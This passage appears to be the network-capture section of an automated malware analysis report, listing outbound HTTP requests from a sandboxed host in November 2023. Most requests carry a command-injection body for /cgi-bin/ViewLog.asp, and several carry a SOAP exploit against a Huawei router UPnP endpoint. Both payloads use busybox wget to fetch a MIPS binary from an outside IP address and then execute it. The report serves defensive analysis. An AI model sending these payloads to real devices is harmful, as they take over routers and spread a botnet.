                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              233192.168.2.145585462.29.62.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.645934105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              234192.168.2.145402094.72.98.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.666991949 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.881568909 CET403INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 130
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              235192.168.2.145667894.121.178.2468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.864758015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              236192.168.2.144060695.86.102.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.875253916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              237192.168.2.145121895.86.83.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.879492998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              238192.168.2.145827894.122.117.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.888607979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              239192.168.2.1452056156.230.23.5337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:09.442783117 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:13.574090958 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:19.717844963 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:31.749381065 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:56.580306053 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:45.730273962 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              240192.168.2.145804494.228.84.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:10.332248926 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
